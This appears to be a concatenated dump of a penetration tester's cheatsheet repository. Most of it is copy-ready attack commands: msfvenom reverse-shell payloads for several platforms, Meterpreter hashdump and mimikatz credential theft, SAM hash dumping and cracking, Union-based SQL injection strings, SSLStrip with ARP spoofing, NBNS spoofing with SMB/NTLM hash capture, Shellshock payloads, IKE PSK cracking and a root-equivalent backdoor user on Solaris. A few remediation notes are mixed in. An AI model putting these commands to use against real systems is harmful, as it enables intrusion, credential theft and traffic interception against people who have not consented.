hookpost-[cmd] - actions to execute after command 39 | define hook-stop - actions to execute when execution stops 40 | 41 | Breakpoints 42 | ------------------ 43 | info breakpoints - list all breakpoints 44 | break [func] - break function name 45 | break *[addr] - break at address 46 | delete [bnum] - delete breakpoint bnum 47 | break if [cond] - break if condition 48 | ignore [bnum] [count] - ignore breakpoint bnum count times 49 | condition [bnum] $eax == 0x22 - add condition for breakpoint bnum 50 | condition [bnum] - delete condition for breakpoint bnum 51 | 52 | Watchpoints 53 | ------------------ 54 | info watchpoints - list all the watchpoints 55 | watch variable==value - break when variable equals .. 56 | watch $eax == 0x0000ffaa - break when register equals .. 57 | rwatch *[addr] - break on read memory location 58 | awatch *[addr] - break on read/write memory location -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_GPG.txt: -------------------------------------------------------------------------------- 1 | Encrypt 2 | ------------ 3 | sudo gpg -e ~/Desktop/file.doc 4 | 5 | This will prompt you to type in the person's name (public key) to encrypt with.
6 | 7 | Decrypt 8 | ----------- 9 | sudo gpg -d ~/Desktop/file.doc.pgp > ~/Desktop/file.doc 10 | 11 | 12 | Import other users' public keys by using: 13 | 14 | sudo gpg --import -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_HTTPBasicAuth.txt: -------------------------------------------------------------------------------- 1 | [>] HTTP Basic Authentication Dictionary and Brute-force attacks with Burp Suite 2 | 3 | http://www.dailysecurity.net/2013/03/22/http-basic-authentication-dictionary-and-brute-force-attacks-with-burp-suite/ 4 | 5 | Burp Suite against HTTP Basic authentication 6 | 7 | To implement the attack you need to capture one authentication request with Burp Proxy and send it to Burp Intruder. 8 | 9 | Mark only the Base64 encoded string and click Add button to put the markers around it. 10 | 11 | Dictionary attack 12 | 13 | For the dictionary attack I’m using custom iterator intruder option. It allows you to generate your own custom payload string consisting from several substrings. For every substring you could specify separator which is basically e suffix. The Intruder calls those substrings “positions”. 14 | Following this logic in position 1 we would like to load an username followed by separator semicolumn and then load password for position 2. 15 | Go to Payload tab and select Custom iterator option from Payload type dropdown box. 16 | Burp Suite Custom Iterator 17 | Select position 1 from the Position dropdown box and load your usernames list in List items for position 1 listbox. Put semicolumn in the Separator for position 1 text box. 18 | Position 1 list and separator option 19 | Select position 2 from the Position dropdown box and load your passwords list in List items for position 2 listbox. 20 | Position 2 21 | After you’ve set your two positions you need to tell the Intruder to encode the payload string using Base64 encoding. 
Go to Payload processing sections and click Add button. Select Payload encoding option and then Base64. 22 | PayloadProcessin_AddRule_Encode 23 | PayloadProcessingEncode 24 | By default Burp Intruder URL encodes the payload. Base64 strings often contain = symbol. That is why it is a good idea to exclude it from the list of URL characters for encoding. 25 | That’s it. You can start the Intruder attack. 26 | 27 | Bruteforce attack 28 | 29 | The method I’m using for the bruteforce attack is targeting only one username per Intruder attack. 30 | Select Brute forcer from the Payload type dropdown and then set the length of the password and the characterset you would like the Intruder to use while constructing the password strings. 31 | Burp Intruder Brute forcer 32 | In order to specify the username you would like to brute-force you need to set Payload processing rule. Add new rule with Add prefix type and fill up the username followed by semi-column. 33 | Burp Intruder Add Prefix 34 | Add another rule to encode the payload using Base64. And finally remove = from the list of symbols subject of URL encoding. 35 | Burp Sutei Bruteforce Attack Settings 36 | Done! You can start the Intruder attack! 37 | 38 | [>] Automated Security Analyser for ASP.NET Websites 39 | 40 | https://asafaweb.com -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_IKEScan.txt: -------------------------------------------------------------------------------- 1 | Aggressive Mode VPN -- IKE-Scan, PSK-Crack 2 | 3 | In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK. 
4 | 5 | This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. For that reason IKE aggressive mode is not very secure. 6 | Mitigation: disable Aggressive Mode on the gateway (use Main Mode or IKEv2) and prefer certificate authentication, or at least a long random PSK, so that a captured hash is not practical to crack. 7 | It looks like this: 8 | 9 | $ ike-scan 192.168.207.134 10 | Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 11 | 12 | 192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797) 13 | Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec). 14 | 0 returned handshake; 1 returned notify 15 | 16 | ---------------------------------------------------------------------------------------------------------------------------------- 17 | 18 | $ sudo ike-scan -A 192.168.207.134 19 | Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/) 20 | 21 | 192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes) 22 | 23 | ---------------------------------------------------------------------------------------------------------------------------------- 24 | 25 | To save with some output: 26 | 27 | $ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key 28 | 29 | Once you have your psk file to crack you're stuck with two options: psk-crack and cain 30 | 31 | ---------------------------------------------------------------------------------------------------------------------------------- 32 | 33 | Brute force: 34 | 35 | $psk-crack -b 5 192-168-207-134key 36 | Running in brute-force cracking mode 37 | Brute force with 36 chars up to length 5 will take up to 60466176 iterations 38 | 39 | no match found for MD5 hash 5c178d[SNIP] 40 | Ending psk-crack: 
60466176 iterations in 138.019 seconds (438099.56 iterations/sec) 41 | 42 | Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset= 43 | 44 | $ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key 45 | Running in brute-force cracking modde 46 | Brute force with 63 chars up to length 5 will take up to 992436543 iterations 47 | 48 | ---------------------------------------------------------------------------------------------------------------------------------- 49 | 50 | Dictionary attack: 51 | 52 | $psk-crack -d /path/to/dictionary 192-168-207-134key 53 | Running in dictionary cracking mode 54 | 55 | no match found for MD5 hash 5c178d[SNIP] 56 | Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec) 57 | 58 | ---------------------------------------------------------------------------------------------------------------------------------- 59 | 60 | References: http://carnal0wnage.attackresearch.com/2011/12/aggressive-mode-vpn-ike-scan-psk-crack.html -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_LocalSamDump.txt: -------------------------------------------------------------------------------- 1 | fdisk -l 2 | 3 | mount -t ntfs /dev/sda1 /mnt 4 | 5 | df -k 6 | 7 | cd /mnt 8 | ls 9 | cd WINDOWS/system32/config 10 | 11 | ls 12 | bkhive system /root/hive.txt 13 | samdump2 SAM /root/hive.txt > /root/hash.txt 14 | 15 | john /root/hash.txt -format=nt2 -users=Administrator 16 | cd /root/.john 17 | ls -l 18 | cat john.pot -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_MSFPostExploitation.txt: -------------------------------------------------------------------------------- 1 | [+] Meterpreter Shell 2 | 3 | meterpreter > sysinfo 4 | 5 | meterpreter > getuid 6 | 7 | meterpreter > getsystem 
8 | 9 | meterpreter > hashdump 10 | 11 | meterpreter > load/use mimikatz 12 | 13 | kerberos Attempt to retrieve kerberos creds 14 | livessp Attempt to retrieve livessp creds 15 | mimikatz_command Run a custom commannd 16 | msv Attempt to retrieve msv creds (hashes) 17 | ssp Attempt to retrieve ssp creds 18 | tspkg Attempt to retrieve tspkg creds 19 | wdigest Attempt to retrieve wdigest creds 20 | 21 | meterpreter > wdigest 22 | 23 | meterpreter > use incognito 24 | meterpreter > list_tokens -u 25 | meterpreter > impersonate_token SERV-2K3\\Administrator 26 | execute -f cmd.exe -i -t -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Metasploit.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Metasploit.pdf -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_MetasploitPayloads.txt: -------------------------------------------------------------------------------- 1 | [+] Creating Metasploit Payloads 2 | 3 | List payloads 4 | msfvenom -l 5 | 6 | Binaries 7 | 8 | Linux 9 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf 10 | 11 | Windows 12 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe 13 | 14 | Mac 15 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho 16 | 17 | 18 | Web Payloads 19 | 20 | PHP 21 | msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php 22 | cat shell.php | pbcopy && echo ' shell.php && pbpaste >> shell.php 23 | 24 | ASP 25 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 26 | 27 | JSP 28 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp 29 | 
30 | WAR 31 | msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war 32 | 33 | 34 | Scripting Payloads 35 | 36 | Python 37 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 38 | 39 | Bash 40 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 41 | 42 | Perl 43 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 44 | 45 | 46 | Shellcode 47 | 48 | For all shellcode see ‘msfvenom –help-formats’ for information as to valid parameters. Msfvenom will output code that is able to be cut and pasted in this language for your exploits. 49 | 50 | Linux Based Shellcode 51 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f 52 | 53 | Windows Based Shellcode 54 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f 55 | 56 | Mac Based Shellcode 57 | msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f 58 | 59 | 60 | Handlers 61 | 62 | Metasploit handlers can be great at quickly setting up Metasploit to be in a position to receive your incoming shells. Handlers should be in the following format. 
63 | 64 | use exploit/multi/handler 65 | set PAYLOAD 66 | set LHOST 67 | set LPORT 68 | set ExitOnSession false 69 | exploit -j -z 70 | 71 | Once the required values are completed the following command will execute your handler – ‘msfconsole -L -r ‘ 72 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_MobileAppTesting.txt: -------------------------------------------------------------------------------- 1 | http://pen-testing.sans.org/blog/pen-testing/2013/12/02/mobile-device-tips-tricks-and-resources 2 | 3 | ------------------------------------------ Mobile Application Test Notes (iPhone) 4 | 5 | 6 | Prepping Device and Application: 7 | 8 | [+] Jailbreak iPhone/iPad - Green Poison / Absinthe 2.04 9 | [+] Enable SSH on iPhone/iPad 10 | [+] Install iFunbox to install the application (http://www.i-funbox.com) 11 | [+] Connect device to lab wireless network 12 | [+] Add web proxy settings - IP address of attacking machine port 8080 13 | [+] Ensure connection and SSH is working 14 | 15 | 16 | Prepping Burp Suite: 17 | 18 | [+] Open Burp Suite and navigate to Proxy->Options, 19 | [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. 20 | 21 | [+] Download and install burp certificate (.crt) onto ipad. 22 | 23 | Mobile Application Penetration Testing: 24 | 25 | [+] Browse the following Directory for insecure storage 26 | [-] /private/var/mobile/applications/ 27 | 28 | 29 | Notes: 30 | 31 | [+] Application file type - x.ipa 32 | 33 | [+] Easy way: 34 | 35 | - Place attacking machine and apple device on wireless network with app installed. 36 | - Email burps .cer to apple device and install 37 | - Start burp and disable firewall on listening machine. 38 | - Change proxy settings on apple device to point to listening burp machine/port. 
39 | 40 | 41 | ------------------------------------------ Mobile Application Test Notes (Android) 42 | 43 | [+] Create a virtual device: 44 | [-] android avd 45 | 46 | [+] Start the emulator: 47 | [-] emulator –avd testavd 48 | 49 | [+] Install the application: 50 | [-] adb install 51 | 52 | [+] Open Burp Suite and navigate to Proxy->Options, 53 | [-] Edit proxy listeners – enter ‘port’ as 8080, disable ‘loopback only’ and select ‘support invisible’. 54 | 55 | [+] Start the emulator and proxy: 56 | [-] emulator –avd testavd –http-proxy http://localhost:8080 57 | 58 | [+] Download and install burp certificate (.crt) onto the emulator using the push shell command. 59 | 60 | 61 | Notes: 62 | 63 | [+] Application file type - x.apk 64 | 65 | Install Certs: http://www.realmb.com/droidCert/ 66 | SQLite Database Browser: http://sourceforge.net/projects/sqlitebrowser/?source=pdlp 67 | 68 | http://www.mcafee.com/uk/resources/white-papers/foundstone/wp-pen-testing-android-apps.pdf -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Networking.txt: -------------------------------------------------------------------------------- 1 | Useful Networking Cheatsheet 2 | ---------------------------- 3 | 4 | [+] Setting up an Ethernet bridge in Ubuntu/Kali Linux 5 | 6 | # Install bridge-utils 7 | sudo apt-get install bridge-utils 8 | 9 | # Disable network-manager + firewall 10 | 11 | # Configuration 12 | 13 | ifconfig 14 | ifconfig eth0 0.0.0.0 15 | ifconfig eth1 0.0.0.0 16 | brctl addbr br0 17 | brctl addif br0 eth0 18 | brctl addif br0 eth1 19 | ifconfig br0 up 20 | dhclient br0 21 | 22 | sudo tcpdump -i br0 -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Oracle.txt: -------------------------------------------------------------------------------- 1 | Oracle Penetration Testing 2 | -------------------------- 3 | 4 | 
Tools within Kali: 5 | 6 | oscanner 7 | root@kali:~# oscanner -s 192.168.1.15 -P 1040 8 | 9 | sidguess 10 | root@kali:~# sidguess -i 192.168.1.205 -d /usr/share/wordlists/metasploit/unix_users.txt 11 | 12 | tnscmd10g 13 | root@kali:~# tnscmd10g version -h 192.168.1.20 14 | 15 | Nmap 16 | nmap -p 1521 -A 192.168.15.205 17 | 18 | Nmap nse scripts 19 | Metasploit auxiliaries -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Pyinstaller.txt: -------------------------------------------------------------------------------- 1 | python.exe c:\Python27\PyInstaller-2.1\pyinstaller.py --noconsole --onefile c:\Python27\PyInstaller-2.1\ReverseShell.py 2 | 3 | [+] Generate the .spec file. 4 | [+] Windows: (You want a single EXE file with your data in it, hence --onefile). 5 | 6 | python pyinstaller.py --onefile your_main_file.py 7 | 8 | [+] Rebuild your package. 9 | 10 | python pyinstaller.py your_main_file.spec 11 | 12 | [+]Look for your .exe or your .app bundle in the dist directory. 
-------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Python.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/P3t3rp4rk3r/My_Dirty_Scripts/763a00dcdd6e77c456e33f288495297000d3bb7a/Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Python.pdf -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Remediations.txt: -------------------------------------------------------------------------------- 1 | [+] Weak SSH Ciphers 2 | 3 | sudo nano /etc/ssh/sshd_config 4 | 5 | Add the following lines: 6 | 7 | Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,arcfour 8 | MACs hmac-sha1,hmac-ripemd160 9 | Note: the arcfour* ciphers are RC4-based and are themselves weak, so leave them out of the list; where the installed OpenSSH supports them, prefer hmac-sha2-256 and hmac-sha2-512 over hmac-sha1. Check the edited file with `sshd -t` before restarting. 10 | Restart SSH 11 | 12 | 13 | [+] Unquoted Service Paths 14 | 15 | Run Regedit and browse to HKLM\SYSTEM\CurrentControlSet\services 16 | Find the service in question and simply add " " either side of the ImagePath string. 
17 | 18 | Check permissions: 19 | C:\Users\user>icacls "C:\Program Files (x86)\Vuln\Vuln Software 7.0\software.exe" -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_SMBCapture.txt: -------------------------------------------------------------------------------- 1 | [+] NBNS Spoof / Capture 2 | 3 | [>] NBNS Spoof 4 | msf > use auxiliary/spoof/nbns/nbns_response 5 | msf auxiliary(nbns_response) > show options 6 | msf auxiliary(nbns_response) > set INTERFACE eth0 7 | msf auxiliary(nbns_response) > set SPOOFIP 10.10.10.10 8 | msf auxiliary(nbns_response) > run 9 | 10 | [>] SMB Capture 11 | 12 | msf > use auxiliary/server/capture/smb 13 | msf auxiliary(smb) > set JOHNPWFILE /tmp/john_smb 14 | msf auxiliary(smb) > run 15 | 16 | [>] HTTP NTLM Capture 17 | 18 | msf auxiliary(smb) > use auxiliary/server/capture/http_ntlm 19 | msf auxiliary(smb) > set JOHNPWFILE /tmp/john_http 20 | msf auxiliary(smb) > set SRVPORT 80 21 | msf auxiliary(smb) > set URIPATH / 22 | msf auxiliary(smb) > run 23 | 24 | 25 | Fix: 26 | http://www.leonteale.co.uk/netbios-nbns-spoofing/ 27 | 28 | Solution 29 | The solution to this is to disable Netbios from broadcasting. The setting for this is in, what I hope, a very familiar place that you might not have really paid attention to before. 30 | netbios 31 | 32 | Netbios, according to Microsoft, is no longer needed as of Windows 2000. 33 | However, there are a few side effects. 34 | One of the unexpected consequences of disabling Netbios completely on your network is how this affects trusts between forests. Windows 2000 let you create an external (non-transitive) trust between a domain in one forest and a domain in a different forest so users in one forest could access resources in the trusting domain of the other forest. 
Windows Server 2003 takes this a step further by allowing you to create a new type of two-way transitive trusts called forest trusts that allow users in any domain of one forest to access resources in any domain of the other forest. Amazingly, NetBIOS is actually still used in the trust creation process, even though Microsoft has officially “deprecated” NetBIOS in versions of Windows from 2000 on. So if you disable Netbios on your domain controllers, you won’t be able to establish a forest trust between two Windows Server 2003 forests. 35 | But Windows 2003 is pretty old, since as of writing we are generally on Windows 2012 now. So if you would like to disable Netbios on your servers yet will be affected by the side effect for Forest trusts then ideally you should upgrade and keep up with the times anyway. Alternatively, you can get away with, at the very least, disabling Netbios on your workstations. 36 | See below for step by step instructions on disabling Netbios on workstations: 37 | 38 | Windows XP, Windows Server 2003, and Windows 2000 39 | On the desktop, right-click My Network Places, and then click Properties. 40 | Right-click Local Area Connection, and then click Properties 41 | In the Components checked are used by this connection list, double-click Internet Protocol (TCP/IP), click Advanced, and then click the WINS tab. Note: In Windows XP and in Windows Server 2003, you must double-click Internet Protocol (TCP/IP) in the This connection uses the following items list. 42 | Click Use NetBIOS setting from the DHCP server, and then click OK three times. (Note: this option only defers to whatever DHCP hands out; to switch NetBIOS off on the adapter itself, select Disable NetBIOS over TCP/IP on the same WINS tab instead. The same applies to the Windows Vista and Windows 7 steps that follow.) 43 | 44 | For Windows Vista 45 | On the desktop, right-click Network, and then click Properties. 46 | Under Tasks, click Manage network connections. 47 | Right-click Local Area Connection, and then click Properties 48 | In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), click Advanced, and then click the WINS tab. 
49 | Click Use NetBIOS setting from the DHCP server, and then click OK three times. 50 | 51 | For Windows 7 52 | Click Start, and then click Control Panel. 53 | Under Network and Internet, click View network status and tasks. 54 | Click Change adapter settings. 55 | Right-click Local Area Connection, and then click Properties. 56 | In the This connection uses the following items list, double-click Internet Protocol Version 4 (TCP/IPv4), clickAdvanced, and then click the WINS tab. 57 | Click Use NetBIOS setting from the DHCP server, and then click OK three times. -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_SMBEnumeration.txt: -------------------------------------------------------------------------------- 1 | SMB Enumeration Techniques using Backtrack: 2 | 3 | 1. NBTSCAN 4 | 5 | root@bt:~# nbtscan -r 10.0.2.0/24 6 | Doing NBT name scan for addresses from 10.0.2.0/24 7 | 8 | IP address NetBIOS Name Server User MAC address 9 | ------------------------------------------------------------------------------ 10 | 10.0.2.0 Sendto failed: Permission denied 11 | 10.0.2.10 12 | 10.0.2.15 METASPLOITABLE METASPLOITABLE 00-00-00-00-00-00 13 | 10.0.2.18 TEST01 TEST01 00-11-21-22-1d-4d 14 | 10.0.2.45 TEST04 TEST04 00-12-d2-34-11-55 15 | 16 | 2. NMAP 17 | 18 | nmap -p 1-65535 -T4 -O -A -v 10.0.2.15 19 | 20 | 3. SMBCLIENT 21 | 22 | root@bt:~# smbclient -L=10.0.2.15 23 | 24 | Null Sessions 25 | 26 | root@bt:~# smbclient \\\\10.0.2.15\\tmp 27 | Enter root's password: 28 | Anonymous login successful 29 | 30 | 31 | SMB Enumeration Techniques using Windows Tools: 32 | 33 | 1. 
NetBIOS Enumerator (nbtenum) 34 | 35 | http://nbtenum.sourceforge.net/ -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_SMTPOpenRelay.txt: -------------------------------------------------------------------------------- 1 | [+] SMTP Open Relay Commands 2 | 3 | [-] ncat -C 86.54.23.178 25 4 | [-] HELO mail.co.uk 5 | [-] MAIL FROM: 6 | [-] RCPT TO: 7 | [-] DATA 8 | Test Email -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_SQLInjection.txt: -------------------------------------------------------------------------------- 1 | [+] Union Based SQL Injection 2 | 3 | ' or 1=1# 4 | 5 | 1' ORDER BY 10# 6 | 7 | 1' UNION SELECT version(),2# 8 | 9 | 1' UNION SELECT version(),database()# 10 | 11 | 1' UNION SELECT version(),user()# 12 | 13 | 1' UNION ALL SELECT table_name,2 from information_schema.tables# 14 | 15 | 1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"# 16 | 17 | 1' UNION ALL SELECT concat(user,char(58),password),2 from users# 18 | 19 | 20 | sqlmap --url="" -p username --user-agent=SQLMAP --threads=10 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_SSLStrip.txt: -------------------------------------------------------------------------------- 1 | 1) Flip your machine into forwarding mode (as root): 2 | echo "1" > /proc/sys/net/ipv4/ip_forward 3 | 4 | 2) Setup iptables to intercept HTTP requests (as root): 5 | iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 6 | 7 | 3) sslstip.py -l 8080 -f lock.ico 8 | 9 | 4) Run arpspoof to redirect traffic to your machine (as root): 10 | arpspoof -i -t 
-------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Solaris.txt: -------------------------------------------------------------------------------- 1 | [+] Solaris vulnerabilities: 2 | 3 | Solaris 7: 4 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 5 | **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client 6 | sendmail_exec LPD - line printer daemon buffer overflow - allows root 7 | heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root 8 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root 9 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 10 | 11 | Solaris 8: 12 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 13 | **ttyprompt TELNET - buffer overflow in solaris login - manual through telnet client 14 | sendmail_exec LPD - line printer daemon buffer overflow - allows root 15 | heap_noir DTSPCD - CDE common desktop environment heap overflow TCP port 6112, runs with root 16 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 17 | no exploit - sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. 18 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 19 | 20 | solaris 9: 21 | sadmind_exec SADMIND - weakness in default security settings - allows root - rootdown.pl 22 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 23 | sadmind_adm_build_path SADMIND - stack buffer overflow in adm_build_path() function. 24 | kcms_readfile kcms / ttdbserverd remote file read (only in msf2) 25 | 26 | Solaris 10: 27 | fuser TELNET - authentication bypass through -f command - can be manually exploited 28 | ypupdated_exec YPUPDATED - weakness in handling of the command shell - allows root. 
29 | 30 | Solaris 11: 31 | fuser TELNET - authentication bypass through -f command - can be manually exploited 32 | 33 | [+] Adding solaris user: 34 | 35 | useradd -u 0 -o pentestuser 36 | passwd -d pentestuser 37 | 38 | [+] In addition, familiarise yourself with rpcinfo, nfsshell, showmount, 'mount -t nfs'. -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Tools.txt: -------------------------------------------------------------------------------- 1 | Browser Addons 2 | -------------- 3 | 4 | - Chrome: 5 | 6 | Recx Security Analyser 7 | Wappalyzer 8 | 9 | - Firefox/Iceweasel: 10 | 11 | Web Developer 12 | Tamper Data 13 | FoxyProxy Standard 14 | User Agent Switcher 15 | PassiveRecon 16 | Wappalyzer 17 | Firebug 18 | HackBar -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_UsefulCommands.txt: -------------------------------------------------------------------------------- 1 | Useful commands 2 | --------------- 3 | 4 | [+] Remove text using sed 5 | 6 | cat SSL_Hosts.txt | sed -r 's/\ttcp\t/:/g' 7 | 8 | [+] Port forwarding using NCAT 9 | 10 | ncat -lvkp 12345 -c "ncat --ssl 192.168.0.1 443" 11 | 12 | [+] Windows 7 or later, build port relay 13 | 14 | C:\> netsh interface portproxy add v4tov4 listenport= listenaddress=0.0.0.0 connectport= connectaddress= 15 | 16 | [+] Grab HTTP Headers 17 | 18 | curl -LIN 19 | 20 | [+] Quickly generate an MD5 hash for a text string using OpenSSL 21 | 22 | echo -n 'text to be encrypted' | openssl md5 23 | 24 | [+] Shutdown a Windows machine from Linux 25 | 26 | net rpc shutdown -I ipAddressOfWindowsPC -U username%password 27 | 28 | [+] Conficker Detection with NMAP 29 | 30 | nmap -PN -d -p445 --script=smb-check-vulns --script-args=safe=1 IP-RANGES 31 | 32 | [+] Determine if a port is open with bash 33 | 34 | (: /dev/null && echo "OPEN" || echo "CLOSED" 
-------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_Vlans.txt: -------------------------------------------------------------------------------- 1 | Configure an Ethernet interface as a VLAN trunk 2 | --------------------------------------------------- 3 | 4 | Suppose that a host requires access to two VLANs, both carried by a trunk connected to physical interface eth0. The assigned IP addresses for the host are 192.168.2.1/24 on VLAN 2 and 192.168.3.1/24 on VLAN 3. 5 | 6 | [+] First install the vlan package if it is not already present: 7 | 8 | apt-get install vlan 9 | 10 | [+] Turn off network-manager 11 | 12 | sudo stop network-manager 13 | 14 | [+] Configuring interfaces 15 | 16 | vconfig add eth0 (you may get a warning message on the first one) 17 | example: vconfig add eth0 101 18 | 19 | ifconfig eth0. /24 up 20 | example: ifconfig eth0.101 192.168.1.10/24 up 21 | 22 | ifconfig eth0. 23 | 24 | Note: If any issues run, ifconfig eth0 0.0.0.0 up 25 | Note: Specify interface with nmap scanning (nmap -e eth0.101) 26 | Note: You will probably need to add individual routes for each vlan if you want to communicate between vlans, don't rely on your default gateway. 
(route add) 27 | 28 | [+] Remove Configuration 29 | vconfig rem eth0.101 30 | -------------------------------------------------------------------------------- /Penentration Testing_Scripts/Cheatsheets/Cheatsheet_VulnVerify.txt: -------------------------------------------------------------------------------- 1 | Verify Various Vulnerabilities 2 | ------------------------------ 3 | 4 | [+] IPMI Cipher Suite Zero Authentication Bypass: 5 | http://www.tenable.com/plugins/index.php?view=single&id=68931 6 | 7 | Tools required: 8 | ipmitool 9 | freeipmi-tools 10 | 11 | ipmitool -I lanplus -H 192.168.0.1 -U Administrator -P notapassword user list 12 | 13 | # Specifying Cipher Suite Zero 14 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword user list 15 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword chassis status 16 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword help 17 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword shell 18 | ipmitool -I lanplus -C 0 -H 192.168.0.1 -U Administrator -P notapassword sensor 19 | 20 | 21 | [+] Bash Remote Code Execution (Shellshock) 22 | http://www.tenable.com/plugins/index.php?view=single&id=77823 23 | 24 | x: () { :;}; /sbin/ifconfig > /tmp/ifconfig.txt 25 | x: () { :;}; echo "Hacked" > /var/www/hacked.html 26 | 27 | 28 | [+] DNS Server Cache Snooping Remote Information Disclosure 29 | http://www.tenable.com/plugins/index.php?view=single&id=12217 30 | 31 | Nmap Script: dns-cache-snoop 32 | http://nmap.org/nsedoc/scripts/dns-cache-snoop.html 33 | 34 | nmap -sU -p 53 --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={host1,host2,host3}' 35 | 36 | 37 | [+] IP Forwarding Enabled 38 | http://www.tenable.com/plugins/index.php?view=single&id=50686 39 | 40 | Nmap Script: ip-forwarding 41 | http://nmap.org/nsedoc/scripts/ip-forwarding.html 42 | 43 | sudo nmap -sn --script ip-forwarding 
